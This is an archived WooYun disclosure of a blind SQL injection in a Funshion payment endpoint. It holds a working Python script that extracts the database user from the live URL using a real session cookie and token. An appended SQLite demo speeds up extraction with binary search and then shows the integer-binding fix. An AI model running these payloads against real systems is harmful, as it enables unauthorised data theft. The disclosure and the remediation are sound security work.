WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles online reader -------- http://drop.zone.ci/
2015-12-26: Details sent to the vendor, awaiting vendor processing
2015-12-26: Vendor has confirmed; details disclosed to the vendor only
2016-01-05: Details disclosed to core white hats and relevant domain experts
2016-01-15: Details disclosed to regular white hats
2016-01-25: Details disclosed to intern white hats
2016-02-08: Details disclosed to the public
~~~python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Injection point (POST body parameter gameId, confirmed first with a length check):
url='http://www.ibidian.com/pay/pay/get_server_list'
POST
gameId=165 and length(user())=26&cache=1451107818
cookie='login_start=1; user_id=cO5txlA6%2FB1rAAq7YXVGXg%3D%3D; user_name=wooyun; nickname=wooyun; user_icon=http%3A%2F%2Fimg.funshion.com%2Fimg%2Fdefault%2Fhead_s_m.jpg; ads_id=1; page_id=1; cookie_timeout=0; token=JM0lbOGuGr9b7rifs51kqqOY9TJ2br_z_mG-glStU_eDUdX4YBAM7xoSFrYQoGsOcLK4Coke14FATjDcImGVazVEJJP9bceszW5Rltw4NK8; encrypted=cO5txlA6%2FB1rAAq7YXVGXg%3D%3D'
'''
import requests

url = 'http://www.ibidian.com/pay/pay/get_server_list'
cookie = 'login_start=1; user_id=cO5txlA6%2FB1rAAq7YXVGXg%3D%3D; user_name=wooyun; nickname=wooyun; user_icon=http%3A%2F%2Fimg.funshion.com%2Fimg%2Fdefault%2Fhead_s_m.jpg; ads_id=1; page_id=1; cookie_timeout=0; token=JM0lbOGuGr9b7rifs51kqqOY9TJ2br_z_mG-glStU_eDUdX4YBAM7xoSFrYQoGsOcLK4Coke14FATjDcImGVazVEJJP9bceszW5Rltw4NK8; encrypted=cO5txlA6%2FB1rAAq7YXVGXg%3D%3D'
referer = 'http://www.ibidian.com/pay/pay/index'
user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'
# character set tried for every position of user(); length(user())=26 was confirmed beforehand
payloads = 'abcdefghijklmnopqrstuvwxyz._@ 0123456789'
user = ''
headers = {'Cookie': cookie, 'Referer': referer, 'User-Agent': user_agent}

for i in range(1, 27):  # one pass per character of the 26-character user()
    for p in payloads:
        # boolean-based blind injection: a true condition returns the full server list,
        # a false one returns a short (near-empty) response
        gameid = '165 and if(ascii(substr(user(),{},1))={},1,0)'.format(i, ord(p))
        data = {'gameId': gameid, 'cache': '1451107818'}
        req = requests.post(url, data=data, headers=headers)
        if len(req.text) > 1000:  # long response == condition true, character found
            user = user + p
            print('\n[User]: ' + user + '\n')
            break
        print(gameid)
print('[FINISH]: ' + user)
~~~
user= [email protected]
Fix suggestion: intval
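The script above tries every character of a fixed alphabet for each position, which costs up to 40 requests per character and misses any character outside the alphabet. The added example below (not part of the WooYun report, and not Funshion's code) reproduces the same boolean oracle against a constructed in-memory SQLite table, extracts a constructed secret with a binary search on the character code (about 8 requests per character, any code point), and then shows the suggested fix: coercing gameId to an integer and binding it as a query parameter. Everything here is an assumption for illustration: the `servers`/`secrets` tables, the secret value `wooyun@localhost` standing in for the page's `user()`, and the response-length threshold. SQLite has no `user()` or `if()`, so the payloads use a scalar subquery and `unicode()`/`substr()` instead of the MySQL forms on the page.

```python
import sqlite3

# Constructed stand-in for the vulnerable endpoint's database (not the real schema).
SECRET = "wooyun@localhost"  # plays the role of the MySQL user() value extracted on the page


def build_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE servers (id INTEGER, game_id INTEGER, name TEXT)")
    con.executemany("INSERT INTO servers VALUES (?, ?, ?)",
                    [(i, 165, "server-%d" % i) for i in range(40)])
    con.execute("CREATE TABLE secrets (value TEXT)")
    con.execute("INSERT INTO secrets VALUES (?)", (SECRET,))
    return con


CON = build_db()


def vulnerable_get_server_list(game_id):
    """Mirrors the reported bug: gameId is concatenated into the SQL text unchanged."""
    sql = "SELECT name FROM servers WHERE game_id=" + game_id
    rows = CON.execute(sql).fetchall()
    return "".join(name for (name,) in rows)  # response body grows with matching rows


def oracle(condition):
    """Boolean oracle exactly as the page used it: a long body means the injected
    condition was true (the page's threshold was len(req.text) > 1000)."""
    body = vulnerable_get_server_list("165 AND (%s)" % condition)
    return len(body) > 100


def bisect_value(expr, lo=0, hi=255):
    """Recover the integer value of a SQL expression with ~log2(hi-lo) oracle queries.
    Invariant: the true value lies in [lo, hi]."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle("(%s)>%d" % (expr, mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_secret():
    """Length first (as the page's length(user())=26 probe did), then each code point."""
    length = bisect_value("SELECT length(value) FROM secrets", 0, 64)
    chars = []
    for i in range(1, length + 1):
        code = bisect_value("SELECT unicode(substr(value,%d,1)) FROM secrets" % i)
        chars.append(chr(code))
    return "".join(chars)


def safe_get_server_list(game_id):
    """The page's suggested fix (intval in PHP): force gameId to an integer before it
    reaches SQL, and bind it as a parameter so the query text never changes."""
    gid = int(str(game_id).strip())  # raises ValueError on '165 AND 1=1'
    rows = CON.execute("SELECT name FROM servers WHERE game_id=?", (gid,)).fetchall()
    return [name for (name,) in rows]


def rejects(game_id):
    """True when the hardened handler refuses the value instead of querying with it."""
    try:
        safe_get_server_list(game_id)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    print("oracle 1=1:", oracle("1=1"), " oracle 1=0:", oracle("1=0"))
    print("extracted:", extract_secret())
    print("hardened rejects payload:", rejects("165 AND 1=1"))
```

One caveat on the fix as stated: PHP's `intval("165 and 1=1")` silently returns 165 rather than rejecting the input, which still defeats the injection because only the number reaches SQL; the Python version above rejects non-integers outright, which is the stricter behaviour to prefer. Either way, the parameter binding is what guarantees the query text cannot be altered.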
Hazard level: Medium
Vulnerability Rank: 10
Confirmation time: 2015-12-26 18:58
Thanks for your attention to Funshion security
None